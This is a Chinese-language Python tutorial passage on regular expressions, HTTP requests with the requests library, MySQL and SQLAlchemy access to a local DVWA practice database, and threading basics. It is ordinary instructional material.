['1', '2', '3', '4', '5', '6', '7', '8', '9'] ['1', '2', '3', '4', '5', '6', '7', '8', '9'] ['u', 'a', 'v', '_', 'u', 'b', 'v', '_', 'u', 'c', 'v', '_', 'u', 'w', 'v', '_', 'u', 'z', 'v', '_', 'u', 'c', 'v', '_', 'u', 'o', 'v', '&', '-', '-'] ['u', 'a', 'v', '_', 'u', 'b', 'v', '_', 'u', 'c', 'v', '_', 'u', 'w', 'v', '_', 'u', 'z', 'v', '_', 'u', 'c', 'v', '_', 'u', 'o', 'v', '&', '-', '-'] ['u', 'a', 'v', '_', 'u', 'b', 'v', '_', 'u', 'c', 'v', '_', 'u', 'w', 'v', '_', 'u', 'z', 'v', '_', 'u', 'c', 'v', '_', 'u', 'o', 'v', '1', '2', '3', '4', '5', '6', '7', '8', '9'] ['u', 'a', 'v', '_', 'u', 'b', 'v', '_', 'u', 'c', 'v', '_', 'u', 'w', 'v', '_', 'u', 'z', 'v', '_', 'u', 'c', 'v', '_', 'u', 'o', 'v', '1', '2', '3', '4', '5', '6', '7', '8', '9']
数量词
数量词的词法是:{min,max} 。min 和 max 都是非负整数。如果逗号有而 max 被忽略了,则 max 没有限制。如果逗号和 max 都被忽略了,则重复 min 次。比如, \b[1-9][0-9]{3}\b ,匹配的是 1000 ~ 9999 之间的数字(“\b” 表示单词边界),而 \b[1-9][0-9]{2,4}\b ,匹配的是一个在 100 ~ 99999 之间的数字。
下面看一个实例,匹配出字符串中 4 到 7 个字母的英文
import re a = 'java*&39android##@@python' # 数量词 findall = re.findall('[a-z]{4,7}', a) print(findall)
输出结果:
['java', 'android', 'python']
注意,这里有贪婪和非贪婪之分。那么我们先看下相关的概念:
贪婪与非贪婪
贪婪与非贪婪模式影响的是被量词修饰的子表达式的匹配行为,贪婪模式在整个表达式匹配成功的前提下,尽可能多的匹配,而非贪婪模式在整个表达式匹配成功的前提下,尽可能少的匹配。
上面例子中的就是贪婪的,如果要使用非贪婪,也就是懒惰模式,怎么用呢?
如果要使用非贪婪,则加一个 ? ,上面的例子修改如下:
import re a = 'java*&39android##@@python' # 贪婪与非贪婪 re_findall = re.findall('[a-z]{4,7}?', a) print(re_findall)
输出结果如下:
['java', 'andr', 'pyth']
从输出的结果可以看出,android 只打印除了 andr ,Python 只打印除了 pyth ,因为这里使用的是懒惰模式。
当然,还有一些特殊字符也是可以表示数量的,比如:
? :告诉引擎匹配前导字符 0 次或 1 次 + :告诉引擎匹配前导字符 1 次或多次 * :告诉引擎匹配前导字符 0 次或多次
把这部分的知识点总结一下,就是下面这个表了:
贪婪 懒惰 描述 ? ?? 零次或一次出现,等价于{0,1} + +? 一次或多次出现 ,等价于{1,} * *? 零次或多次出现 ,等价于{0,} {n} {n}? 恰好 n 次出现 {n,m} {n,m}? 至少 n 次枝多 m 次出现 {n,} {n,}? 至少 n 次出现
默认是贪婪模式,也就是说尽量多匹配更长的字符串。
非贪婪很简单,在重复的符号后面加上一个?问号,就尽量的少匹配了。
代码 说明 举例 *? 匹配任意次,但尽可能少重复 +? 匹配至少1次,,但尽可能少重复 ?? 匹配0次或1次,,但尽可能少重复 {n,}? 匹配至少n次,但尽可能少重复 {n,m}? 匹配至少n次,至多m次,但尽可能少重复
very very happy 使用v.*y和v.*?y
断言
零宽断言
测试字符串为wood took foot food
- (?=exp)
零宽度正预测先行断言
断言exp一定在匹配的右边出现,也就是说断言后面一定跟个exp
例:f(?=oo) f后面一定有oo出现 - (?<=exp)
零宽度正回顾后发断言
断言exp一定出现在匹配的左边出现,也就是说前面一定有个exp前缀
例:(?<=f)ood、(?<=t)ook分别匹配ood、ook,ook前一定有t出现
负向零宽断言
- (?!exp)
零宽度负预测先行断言
断言exp一定不会出现在右侧,也就是说断言后面一定不是exp
例:
\d{3}(?!\d)匹配3位数字,断言3位数字后面一定不能是数字
foo(?!d) foo后面一定不是d - (?<!exp)
零宽度负回顾后发断言
断言exp一定不能出现在左侧,也就是说断言前面一定不能是exp
例:(?<!f)ood ood的左边一定不是f - (?#comment) 注释
例:f(?=oo)(?#这个后断言不捕获)
注意:
断言会不会捕获呢?也就是断言占不占分组号呢?
断言不占分组号。断言如同条件,只是要求匹配必须满⾜断言的条件。
分组和捕获是同一个意思。
使用正则表达式时,能用简单表达式,就不要复杂的表达式。
范例:
import re a = 'wood took foot food' findall = re.findall('f(?=oo)', a) print(findall) # ['f', 'f']
边界匹配符和组
将上面几个点,就用了很大的篇幅了,现在介绍一些边界匹配符和组的概念。
一般的边界匹配符有以下几个:
语法 描述 ^ 匹配字符串开头(在有多行的情况中匹配每行的开头) $ 匹配字符串的末尾(在有多行的情况中匹配每行的末尾) \A 仅匹配字符串开头 \Z 仅匹配字符串末尾 \b 匹配 \w 和 \W 之间 \B [^\b]
分组,被括号括起来的表达式就是分组。分组表达式 (…) 其实就是把这部分字符作为一个整体,当然,可以有多分组的情况,每遇到一个分组,编号就会加 1 ,而且分组后面也是可以加数量词的。
re.sub
实战过程中,我们很多时候需要替换字符串中的字符,这时候就可以用到 def sub(pattern, repl, string, count=0, flags=0) 函数了,re.sub 共有五个参数。其中三个必选参数:pattern, repl, string ; 两个可选参数:count, flags .
具体参数意义如下:
参数 描述 pattern 表示正则中的模式字符串 repl repl,就是replacement,被替换的字符串的意思 string 即表示要被处理,要被替换的那个 string 字符串 count 对于pattern中匹配到的结果,count可以控制对前几个group进行替换 flags 正则表达式修饰符
具体使用可以看下下面的这个实例,注释都写的很清楚的了,主要是注意一下,第二个参数是可以传递一个函数的,这也是这个方法的强大之处,例如例子里面的函数 convert ,对传递进来要替换的字符进行判断,替换成不同的字符。
#!/usr/bin/env python3 # -*- coding: UTF-8 -*- import re a = 'Python*Android*Java-888' # 把字符串中的 * 字符替换成 & 字符 sub1 = re.sub('\*', '&', a) print(sub1) # 把字符串中的第一个 * 字符替换成 & 字符 sub2 = re.sub('\*', '&', a, 1) print(sub2) # 把字符串中的 * 字符替换成 & 字符,把字符 - 换成 | # 1、先定义一个函数 def convert(value): group = value.group() if (group == '*'): return '&' elif (group == '-'): return '|' # 第二个参数,要替换的字符可以为一个函数 sub3 = re.sub('[\*-]', convert, a) print(sub3)
输出的结果:
Python&Android&Java-888 Python&Android*Java-888 Python&Android&Java|888
re.match 和 re.search
re.match 函数
语法:
re.match(pattern, string, flags=0)
re.match 尝试从字符串的起始位置匹配一个模式,如果不是起始位置匹配成功的话,match() 就返回 none。
a = 'Python*Android*Java-888' # 使用 re.match match = re.match('[a-zA-Z]{4,7}', a) # group(0) 是一个完整的分组 print(match.group(0)) #Python # 限制匹配长度为 7 match = re.match('[a-zA-Z]{7}', a) print(match.group(0)) #报错,没有从起始位置7位的字符串
re.search 函数
语法:
re.search(pattern, string, flags=0)
re.search 扫描整个字符串并返回第一个成功的匹配。
re.match 和 re.search 的参数,基本一致的,具体描述如下:
参数 描述 pattern 匹配的正则表达式 string 要匹配的字符串 flags 标志位,用于控制正则表达式的匹配方式,如:是否区分大小写
那么它们之间有什么区别呢?
re.match 只匹配字符串的开始,如果字符串开始不符合正则表达式,则匹配失败,函数返回 None;而 re.search匹配整个字符串,直到找到一个匹配。这就是它们之间的区别了。
可能在个人的使用中,可能更多的还是使用 re.findall
看下下面的实例,可以对比下 re.search 和 re.findall 的区别,还有多分组的使用。具体看下注释,对比一下输出的结果:
示例:
#!/usr/bin/env python3 # -*- coding: UTF-8 -*- # 提取图片的地址 import re a = '<img src="https://www.cici.com/a8c49ef606e0e1f3ee28932usk89105e.jpg">' # 使用 re.search search = re.search('<img src="(.*)">', a) # group(0) 是一个完整的分组 print(search.group(0)) print(search.group(1)) # 使用 re.findall findall = re.findall('<img src="(.*)">', a) print(findall) # 多个分组的使用(比如我们需要提取 img 字段和图片地址字段) re_search = re.search('<(.*) src="(.*)">', a) # 打印 img print(re_search.group(1)) # 打印图片地址 print(re_search.group(2)) # 打印 img 和图片地址,以元祖的形式 print(re_search.group(1, 2)) #('img', 'https://www.cici.com/a8c49ef606e0e1f3ee28932usk89105e.jpg') # 或者使用 groups print(re_search.groups())
输出的结果:
<img src="https://www.cici.com/a8c49ef606e0e1f3ee28932usk89105e.jpg"> https://www.cici.com/a8c49ef606e0e1f3ee28932usk89105e.jpg ['https://www.cici.com/a8c49ef606e0e1f3ee28932usk89105e.jpg'] img https://www.cici.com/a8c49ef606e0e1f3ee28932usk89105e.jpg ('img', 'https://www.cici.com/a8c49ef606e0e1f3ee28932usk89105e.jpg') ('img', 'https://www.cici.com/a8c49ef606e0e1f3ee28932usk89105e.jpg')
正则习题
IP地址
匹配合法的IP地址
192.168.1.150 0.0.0.0 255.255.255.255 17.16.52.100 172.16.0.100 400.400.999.888 001.022.003.000 257.257.255.256
提取文件名
选出含有ftp的链接,且文件类型是gz或者xz的文件名
ftp://ftp.astron.com/pub/file/file-5.14.tar.gz ftp://ftp.gmplib.org/pub/gmp-5.1.2/gmp-5.1.2.tar.xz ftp://ftp.vim.org/pub/vim/unix/vim-7.3.tar.bz2 http://anduin.linuxfromscratch.org/sources/LFS/lfs-packages/conglomeration//iana-etc/iana-etc-2.30.tar.bz2 http://anduin.linuxfromscratch.org/sources/other/udev-lfs-205-1.tar.bz2 http://download.savannah.gnu.org/releases/libpipeline/libpipeline-1.2.4.tar.gz http://download.savannah.gnu.org/releases/man-db/man-db-2.6.5.tar.xz http://download.savannah.gnu.org/releases/sysvinit/sysvinit-2.88dsf.tar.bz2 http://ftp.altlinux.org/pub/people/legion/kbd/kbd-1.15.5.tar.gz http://mirror.hust.edu.cn/gnu/autoconf/autoconf-2.69.tar.xz http://mirror.hust.edu.cn/gnu/automake/automake-1.14.tar.xz
匹配邮箱地址
test@hot-mail.com [email protected] [email protected] [email protected] a@w-a-com
匹配html标记
提取href中的链接url,提取文字“CiCi”
<a href='http://www.cici.com/index.html' target='_blank'>CiCi</a>
匹配URL
http://www.cici.com/index.html https://login.cici.com file:///ect/sysconfig/network
匹配二代中国身份证ID
321105700101003 321105197001010030 11210020170101054X 17位数字+1位校验码组成 前6位地址码,8位出生年月,3位数字,1位校验位(0-9或X)
Python 网络编程
使用python发起网络请求,处理网络请求。
requests
Requests 允许你发送原始的HTTP请求,无需手工劳动。你不需要手动为 URL 添加查询字串,也不需要对 POST数据进行表单编码。Keep-alive 和 HTTP 连接池的功能是 100% 自动化的。
安装requests
要安装 Requests,只要在你的终端中运行这个简单命令即可:
$ pip install requests
发送请求
使用 Requests 发送网络请求非常简单。
一开始要导入 Requests 模块:
>>> import requests
然后,尝试获取某个网页。本例子中,我们来获取 CiCi 的网站:
>>> r = requests.get('https://www.cici.com')
>>> print(r.text)
现在,我们有一个名为 r 的 Response 对象。我们可以从这个对象中获取所有我们想要的信息。
Requests 简便的 API 意味着所有 HTTP 请求类型都是显而易见的。例如,你可以这样发送一个 HTTP POST 请求:
>>> r = requests.post('http://www.cici.com', data = {'key':'value'})
那么其他 HTTP 请求类型:PUT,DELETE,HEAD 以及 OPTIONS 又是如何的呢?都是一样的简单:
>>> r = requests.put('http://www.cici.com/put', data = {'key':'value'}) >>> r = requests.delete('http://www.cici.com/delete') >>> r = requests.head('http://www.cici.com/get') >>> r = requests.options('http://www.cici.com/get')
使用requests 发起各种http请求方法都非常简单。
传递 URL 参数
当使用GET请求时,我们经常要传递参数,Requests 允许你使用 params 关键字参数,以一个字符串字典来提供这些参数。
举例来说,如果你想传递 key1=value1 和 key2=value2 到 www.cici.com ,那么你可以使用如下代码:
>>> payload = {'key1': 'value1', 'key2': 'value2'} >>> r = requests.get("http://www.cici.com", params=payload)
通过打印输出该 URL,你能看到 URL 已被正确编码:
>>> print(r.url) http://www.cici.com?key2=value2&key1=value1
注意字典里值为 None 的键都不会被添加到 URL 的查询字符串里。
你还可以将一个列表作为值传入:
>>> payload = {'key1': 'value1', 'key2': ['value2', 'value3']} >>> r = requests.get('http://www.cici.com', params=payload) >>> print(r.url) http://www.cici.com?key1=value1&key2=value2&key2=value3
响应内容
我们能读取服务器响应的内容。再次以 GitHub 时间线为例:
>>> import requests >>> r = requests.get('https://api.github.com/events') >>> r.text u'[{"repository":{"open_issues":0,"url":"https://github.com/...
Requests 会自动解码来自服务器的内容。大多数 unicode 字符集都能被无缝地解码。
请求发出后,Requests 会基于 HTTP 头部对响应的编码作出有根据的推测。当你访问 r.text 之时,Requests会使用其推测的文本编码。你可以找出 Requests 使用了什么编码,并且能够使用 r.encoding 属性来改变它:
>>> r.encoding 'utf-8' >>> r.encoding = 'ISO-8859-1'
如果你改变了编码,每当你访问 r.text ,Request 都将会使用 r.encoding 的新值。
在你需要的情况下,Requests 也可以使用定制的编码。如果你创建了自己的编码,并使用 codecs 模块进行注册,你就可以轻松地使用这个解码器名称作为 r.encoding 的值, 然后由 Requests 来为你处理编码。
JSON 响应内容
Requests 中也有一个内置的 JSON 解码器,助你处理 JSON 数据:
>>> import requests >>> r = requests.get('https://api.github.com/events') >>> r.json() [{u'repository': {u'open_issues': 0, u'url': 'https://github.com/...
如果 JSON 解码失败, r.json() 就会抛出一个异常。例如,响应内容是 401 (Unauthorized),尝试访问r.json() 将会抛出 ValueError: No JSON object could be decoded 异常。
需要注意的是,成功调用 r.json() 并不意味着响应的成功。有的服务器会在失败的响应中包含一个 JSON 对象(比如 HTTP 500 的错误细节)。这种 JSON 会被解码返回。要检查请求是否成功,请使用r.raise_for_status() 或者检查 r.status_code 是否和你的期望相同。
原始响应内容
在特殊的情况下,你可能想获取来自服务器的原始套接字响应,那么你可以访问 r.raw 。 如果你确实想这么干,那请你确保在初始请求中设置了 stream=True 。具体你可以这么做:
>>> r = requests.get('https://api.github.com/events', stream=True) >>> r.raw <requests.packages.urllib3.response.HTTPResponse object at 0x101194810> >>> r.raw.read(10) '\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03'
但一般情况下,你应该以下面的模式将文本流保存到文件:
with open(filename, 'wb') as fd: for chunk in r.iter_content(chunk_size): fd.write(chunk)
使用 Response.iter_content 将会处理大量你直接使用 Response.raw 不得不处理的。 当流下载时,上面是优先推荐的获取内容方式。 Note that chunk_size can be freely adjusted to a number that may better fit your use cases.
定制请求头
如果你想为请求添加 HTTP 头部,只要简单地传递一个 dict 给 headers 参数就可以了。
例如,在前一个示例中我们没有指定 content-type:
>>> url = 'https://api.github.com/some/endpoint' >>> headers = {'user-agent': 'my-app/0.0.1'} >>> r = requests.get(url, headers=headers)
POST 请求
通常,你想要发送一些编码为表单形式的数据——非常像一个 HTML 表单。要实现这个,只需简单地传递一个字典给 data 参数。你的数据字典在发出请求时会自动编码为表单形式:
>>> payload = {'key1': 'value1', 'key2': 'value2'} >>> r = requests.post("http://httpbin.org/post", data=payload) >>> print(r.text) { ... "form": { "key2": "value2", "key1": "value1" }, ... }
你还可以为 data 参数传入一个元组列表。在表单中多个元素使用同一 key 的时候,这种方式尤其有效:
>>> payload = (('key1', 'value1'), ('key1', 'value2')) >>> r = requests.post('http://httpbin.org/post', data=payload) >>> print(r.text) { ... "form": { "key1": [ "value1", "value2" ] }, ... }
很多时候你想要发送的数据并非编码为表单形式的。如果你传递一个 string 而不是一个 dict ,那么数据会被直接发布出去。
例如,Github API v3 接受编码为 JSON 的 POST/PATCH 数据:
>>> import json >>> url = 'https://api.github.com/some/endpoint' >>> payload = {'some': 'data'} >>> r = requests.post(url, data=json.dumps(payload))
此处除了可以自行对 dict 进行编码,你还可以使用 json 参数直接传递,然后它就会被自动编码。这是 2.4.2 版的新加功能:
>>> url = 'https://api.github.com/some/endpoint' >>> payload = {'some': 'data'} >>> r = requests.post(url, json=payload)
响应状态码
我们可以检测响应状态码:
>>> r = requests.get('http://httpbin.org/get')
>>> r.status_code
200
为方便引用,Requests还附带了一个内置的状态码查询对象:
>>> r.status_code == requests.codes.ok True
响应头
我们可以查看以一个 Python 字典形式展示的服务器响应头:
>>> r.headers { 'content-encoding': 'gzip', 'transfer-encoding': 'chunked', 'connection': 'close', 'server': 'nginx/1.0.4', 'x-runtime': '148ms', 'etag': '"e1ca502697e5c9317743dc078f67693f"', 'content-type': 'application/json' }
HTTP 头部是大小写不敏感的。
因此,我们可以使用任意大写形式来访问这些响应头字段:
>>> r.headers['Content-Type'] 'application/json' >>> r.headers.get('content-type') 'application/json'
Cookie
如果某个响应中包含一些 cookie,你可以快速访问它们:
>>> url = 'http://example.com/some/cookie/setting/url' >>> r = requests.get(url) >>> r.cookies['example_cookie_name'] 'example_cookie_value'
要想发送你的cookies到服务器,可以使用 cookies 参数:
>>> url = 'http://httpbin.org/cookies' >>> cookies = dict(cookies_are='working') >>> r = requests.get(url, cookies=cookies) >>> r.text '{"cookies": {"cookies_are": "working"}}'
Cookie 的返回对象为 RequestsCookieJar ,它的行为和字典类似,但接口更为完整,适合跨域名跨路径使用。
你还可以把 Cookie Jar 传到 Requests 中:
>>> jar = requests.cookies.RequestsCookieJar() >>> jar.set('tasty_cookie', 'yum', domain='httpbin.org', path='/cookies') >>> jar.set('gross_cookie', 'blech', domain='httpbin.org', path='/elsewhere') >>> url = 'http://httpbin.org/cookies' >>> r = requests.get(url, cookies=jar) >>> r.text '{"cookies": {"tasty_cookie": "yum"}}'
重定向与请求历史
默认情况下,除了 HEAD, Requests 会自动处理所有重定向。
可以使用响应对象的 history 方法来追踪重定向。
Response.history 是一个 Response 对象的列表,为了完成请求而创建了这些对象。这个对象列表按照从最老到最近的请求进行排序。
例如,Github 将所有的 HTTP 请求重定向到 HTTPS:
>>> r = requests.get('http://github.com') >>> r.url 'https://github.com/' >>> r.status_code 200 >>> r.history [<Response [301]>]
如果你使用的是GET、OPTIONS、POST、PUT、PATCH 或者 DELETE,那么你可以通过 allow_redirects 参数禁用重定向处理:
>>> r = requests.get('http://github.com', allow_redirects=False) >>> r.status_code 301 >>> r.history []
如果你使用了 HEAD,你也可以启用重定向:
>>> r = requests.head('http://github.com', allow_redirects=True) >>> r.url 'https://github.com/' >>> r.history [<Response [301]>]
超时
你可以告诉 requests 在经过以 timeout 参数设定的秒数时间之后停止等待响应。基本上所有的生产代码都应该使用这一参数。如果不使用,你的程序可能会永远失去响应:
>>> requests.get('http://github.com', timeout=0.001) Traceback (most recent call last): File "<stdin>", line 1, in <module> requests.exceptions.Timeout: HTTPConnectionPool(host='github.com', port=80): Request timed out. (timeout=0.001)
注意
timeout 仅对连接过程有效,与响应体的下载无关。 timeout 并不是整个下载响应的时间限制,而是如果服务器在 timeout 秒内没有应答,将会引发一个异常.
Python数据库编程
Python 的 MySQL 连接器模块用于将 MySQL 数据库与 Python 程序连接起来。它使用 Python 标准库并且没有依赖项。
安装模块
pip install mysql-connector
使用 MySQL-Connector Python 连接 MySQL 数据库
Python Mysql 连接器模块方法
- connect(): 该函数用于与MySQL服务器建立连接。 以下是用于启动连接的参数:
- user: 与用于验证连接的 MySQL 服务器关联的用户名
- 密码: 与用户名关联的密码,用于身份验证
- 数据库: MySQL中用于创建表的
- user: 与用于验证连接的 MySQL 服务器关联的用户名
- cursor() : 游标是执行SQL命令时在系统内存中创建的工作空间。 该内存是临时的,并且游标连接在整个会话/生命周期内都是有界的,并且命令被执行
- execute() :execute 函数将 SQL 查询作为参数并执行。 查询是用于创建、插入、检索、更新、删除等的 SQL命令。
在以下示例中,我们将使用 connect() 连接到 MySQL 数据库
# Python program to connect # to mysql database import mysql.connector # Connecting from the server conn = mysql.connector.connect(user = 'username', host = 'localhost', database = 'database_name') print(conn) # Disconnecting from the server conn.close()
同样,我们可以使用 connection.MySQLConnection() 类而不是 connect():
# Python program to connect # to mysql database from mysql.connector import connection # Connecting to the server conn = connection.MySQLConnection(user = 'username', host = 'localhost', database = 'database_name') print(conn) # Disconnecting from the server conn.close()
另一种方法是使用 '**' 运算符在 connect() 函数中传递字典:
# Python program to connect # to mysql database from mysql.connector import connection dict = { 'user': 'root', 'host': 'localhost', 'database': 'dvwa' } # Connecting to the server conn = connection.MySQLConnection(**dict) print(conn) # Disconnecting from the server conn.close()
Python MySQL – Select Query
使用查询语句
# importing required library import mysql.connector # connecting to the database dataBase = mysql.connector.connect( host = "localhost", user = "root", passwd = "", database = "dvwa" ) # preparing a cursor object cursorObject = dataBase.cursor() #生成游标 # selecting query query = "SELECT NAME, ROLL FROM USERS" cursorObject.execute(query) myresult = cursorObject.fetchall() for x in myresult: print(x) # disconnecting from server dataBase.close()
Python MySQL – Update Query
使用update 语句
# Python program to demonstrate # update clause import mysql.connector # Connecting to the Database mydb = mysql.connector.connect( host ='localhost', database ='dvwa', user ='root', ) cs = mydb.cursor() statement ="UPDATE USERS SET AGE = 23 WHERE Name ='Rishi Kumar'" cs.execute(statement) mydb.commit() # Disconnecting from the database mydb.close()
Python使用ORM框架
安装sqlalchemy
在使用sqlalchemy之前要先给python安装mysql驱动,由于我使用的是python3原来的mysqldb不可用,所以这里推荐使用pymysql。
我们通过pip进行安装,在windows下使用pip安装包的时候要记得使用管理员身份运行cmd不然有些操作是无法进行的。
pip install pymysql
安装完以后安装再安装sqlalchemy
pip install sqlalchemy
创建一个连接引擎
conn/connect.py
from sqlalchemy import create_engine engine = create_engine("mysql+pymysql://root:@localhost:33060/dvwa", echo=True)
create_engine("数据库类型+数据库驱动://数据库用户名:数据库密码@IP地址:端口/数据库",其他参数)
这 echo=True 参数表示连接发出的 SQL 将 被记录到标准输出。
根据dvwa users 表的内容,写orm model
mysql> desc users; +--------------+-------------+------+-----+-------------------+-----------------------------+ | Field | Type | Null | Key | Default | Extra | +--------------+-------------+------+-----+-------------------+-----------------------------+ | user_id | int(6) | NO | PRI | 0 | | | first_name | varchar(15) | YES | | NULL | | | last_name | varchar(15) | YES | | NULL | | | user | varchar(15) | YES | | NULL | | | password | varchar(32) | YES | | NULL | | | avatar | varchar(70) | YES | | NULL | | | last_login | timestamp | NO | | CURRENT_TIMESTAMP | on update CURRENT_TIMESTAMP | | failed_login | int(3) | YES | | NULL | | +--------------+-------------+------+-----+-------------------+-----------------------------+ 8 rows in set (0.00 sec) mysql> select user_id,user,password from users; +---------+---------+----------------------------------+ | user_id | user | password | +---------+---------+----------------------------------+ | 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | | 2 | gordonb | e99a18c428cb38d5f260853678922e03 | | 3 | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | | 4 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | | 5 | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | +---------+---------+----------------------------------+ 5 rows in set (0.00 sec)
conn/dvwa_model.py
from sqlalchemy import Column from sqlalchemy import Integer from sqlalchemy import String from sqlalchemy import TIMESTAMP from sqlalchemy.orm import declarative_base Base = declarative_base() class Users(Base): __tablename__ = "users" user_id = Column(Integer, primary_key=True, nullable=False) first_name = Column(String(15), nullable=True) last_name = Column(String(15), nullable=True) user = Column(String(15), nullable=True) password = Column(String(32), nullable=True) avatar = Column(String(70), nullable=True) last_login = Column(TIMESTAMP(True), nullable=False) failed_login = Column(Integer, nullable=True)
使用ORM框架写查询逻辑
sqlalchemy_test.py
from conn.connect import engine from sqlalchemy.orm import Session from sqlalchemy import select from dvwa_model import Users session = Session(engine) stmt = select(Users) # session.scalars 返回可遍历对象 for user in session.scalars(stmt): print("user id:%s name:%s" % (user.user_id, user.first_name)) session.close()
使用ORM框架插入数据
from conn.connect import engine from sqlalchemy.orm import Session from sqlalchemy import select from dvwa_model import Users session = Session(engine) session.add(Users(user_id=6, first_name="cici", last_name=".com", user="m")) session.commit() session.close()
使用ORM框架更新数据
from conn.connect import engine from sqlalchemy.orm import Session from sqlalchemy import select from dvwa_model import Users session = Session(engine) stmt = select(Users).where(Users.user_id == 6) data = session.scalars(stmt).one() data.user = 'cici' session.commit() session.close()
使用ORM框架删除数据
from conn.connect import engine from sqlalchemy.orm import Session from sqlalchemy import select from dvwa_model import Users session = Session(engine) stmt = select(Users).where(Users.user_id == 6) data = session.scalars(stmt).one() session.delete(data) session.commit() session.close()
Python多线程与多进程
进程和线程
进程(Process)是计算机中的程序关于某数据集合上的一次运行活动,是系统进行资源分配和调度的基本单位,是操作系统结构的基础。
进程和程序的关系:程序是源代码编译后的文件,而这些文件存放在磁盘上。当程序被操作系统加载到内存中,就是进程,进程中存放着指令和数据(资源)。一个程序的执行实例就是一个进程。它也是线程的容器。
Linux进程有父进程、子进程,Windows的进程是平等关系。
在实现了线程的操作系统中,线程是操作系统能够进行运算调度的最小单位。它被包含在进程之中,是进程中的实际运作单位。
线程,有时被称为轻量级进程(Lightweight Process,LWP),是程序执行流的最小单元。
一个标准的线程由线程ID,当前指令指针(PC)、寄存器集合和堆、栈组成。
在许多系统中,创建一个线程比创建一个进程快10-100倍。
进程、线程的理解
现代操作系统提出进程的概念,每一个进程都认为自己独占所有的计算机硬件资源。
进程就是独立的王国,进程间不可以随便的共享数据。
线程就是省份,同一个进程内的线程可以共享进程的资源,每一个线程拥有自己独立的堆栈。
线程的状态
状态 含义 就绪(Ready): 线程能够运行,但在等待被调度。可能线程刚刚创建启动,或刚刚从阻塞中恢复,或者被其他线程抢占 运行(Running): 线程正在运行 阻塞(Blocked): 线程等待外部事件发生而无法运行,如I/O操作 终止(Terminated): 线程完成,或退出,或被取消
Python中的进程和线程
运行程序会启动一个解释器进程,线程共享一个解释器进程。
Python的线程开发
Python的线程开发使用标准库threading。
进程靠线程执行代码,至少有一个主线程,其它线程是工作线程。主线程是第一个启动的线程,由解释器创建。
父线程:如果线程A中启动了一个线程B,A就是B的父线程。
子线程:B就是A的子线程。
Thread类
# 签名 def __init__(self, group=None, target=None, name=None, args=(), kwargs=None, *, daemon=None)
参数名 含义 target 线程调用的对象,就是目标函数 name 为线程起个名字 args 为目标函数传递实参,元组 kwargs 为目标函数关键字传参,字典
group必须为None,保留,留给未来实现线程组。截止3.8还未实现。
线程启动
import threading # 最简单的线程程序 def worker(): print("I'm working") print('Fineshed') t = threading.Thread(target=worker, name='worker') # 线程对象 t.start() # 启动
通过threading.Thread创建一个线程对象,target是目标函数,可以使用name为线程指定名称。但是线程没有启动,需要调用start方法。
线程之所以执行函数,是因为线程中就是要执行代码的,而最简单的代码封装就是函数,所以还是函数调用。
函数执行完,线程也就退出了。
那么,如果不让线程退出,或者让线程一直工作怎么办呢?
import threading import time def worker(): while True: # for i in range(10): time.sleep(0.5) print("I'm working") print('Fineshed') t = threading.Thread(target=worker, name='worker') # 线程对象 t.start() # 启动 print('=' * 30) # 注意看这行等号什么时候打印的?
线程退出
Python没有提供线程退出的方法,线程在下面情况时退出
1、线程函数内语句执行完毕
2、线程函数中抛出未处理的异常
import threading import time def worker(): for i in range(10): time.sleep(0.5) if i > 5: #break # 终止循环 #return # 函数返回 raise RuntimeError # 抛异常 print('I am working') print('finished') t = threading.Thread(target=worker, name='worker') t.start() print('=' * 30)
Python的线程没有优先级、没有线程组的概念,也不能被销毁、停止、挂起,那也就没有恢复、中断了。
线程的传参
import threading import time def add(x, y): print('{} + {} = {} {}'.format(x, y, x + y, threading.current_thread().ident)) #线程id t1 = threading.Thread(target=add, name='add', args=(4, 5)) t1.start() time.sleep(2) t2 = threading.Thread(target=add, name='add', args=(6,), kwargs={'y':7}) t2.start() time.sleep(2) t3 = threading.Thread(target=add, name='add', kwargs={'x':8, 'y':9}) t3.start()
线程传参和函数传参没什么区别,本质上就是函数传参。
threading的属性和方法
名称 含义 current_thread() 返回当前线程对象 main_thread() 返回主线程对象 active_count() 当前处于alive状态的线程个数 enumerate() 返回所有活着的线程的列表,不包括已经终止的线程和未开始的线程 get_ident() 返回当前线程的ID,非0整数
active_count、enumerate方法返回的值还包括主线程。
import threading import time def showtreadinfo(): print('current thread = {}\nmain thread = {}\nactive count = {}'.format( threading.current_thread(), threading.main_thread(), threading.active_count() )) def worker(): showtreadinfo() for i in range(5): time.sleep(1) print('i am working') print('finished') t = threading.Thread(target=worker, name='worker') # 线程对象 showtreadinfo() time.sleep(1) t.start() # 启动 print('===end===')
Thread实例的属性和方法
名称 含义
name 只是一个名字,只是个标识,名称可以重名。getName()、setName()获取、设置这个名词
ident 线程ID,它是非0整数。线程启动后才会有ID,否则为None。线程退出,此ID依旧可以访问。此ID可以重复使用
is_alive() 返回线程是否活着
注意:线程的name这是一个名称,可以重复;ID必须唯一,但可以在线程退出后再利用。
import threading import time def worker(): for i in range(5): time.sleep(1) print('i am working') print('finished') t = threading.Thread(target=worker, name='worker') # 线程对象 print(t.name, t.ident) time.sleep(1) t.start() # 启动 print('===end===') while True: time.sleep(1) print('{} {} {}'.format(t.name, t.ident, 'alive' if t.is_alive() else 'dead')) if not t.is_alive(): print('{} restart'.format(t.name)) t.start() # 线程重启??
start和run方法
import threading import time def worker(): for i in range(5): time.sleep(1) print('I am working') print('finished') class MyThread(threading.Thread): def start(self): print('start~~~~') super().start() def run(self): print('run~~~~~~') super().run() t = MyThread(target=worker, name='worker') # 线程对象 t.start() # 启动 t.start() # t.run() # 或调用run方法 # t.run()
尝试start两次,或run两次都失败了,但是它们抛出的异常不一样。
但是单独运行start或者run都可以,是否可以不需要start方法了吗?在worker中打印线程名称、id。
import threading import time def worker(): t = threading.current_thread() for i in range(5): time.sleep(1) print('I am working', t.name, t.ident) print('finished') class MyThread(threading.Thread): def start(self): print('start~~~~') super().start() def run(self): print('run~~~~~~') super().run() t = MyThread(target=worker, name='worker') # 线程对象 t.start() # 启动
start方法才能启动操作系统线程,并运行run方法。run方法内部调用了目标函数。
多线程
顾名思义,多个线程,一个进程中如果有多个线程运行,就是多线程,实现一种并发。
import threading import time import sys def worker(f=sys.stdout): t = threading.current_thread() for i in range(5): time.sleep(1) print('i am working', t.name, t.ident, file=f) print('finished', file=f) t1 = threading.Thread(target=worker, name='worker1') t2 = threading.Thread(target=worker, name='worker2', args=(sys.stderr,)) t1.start() t2.start()
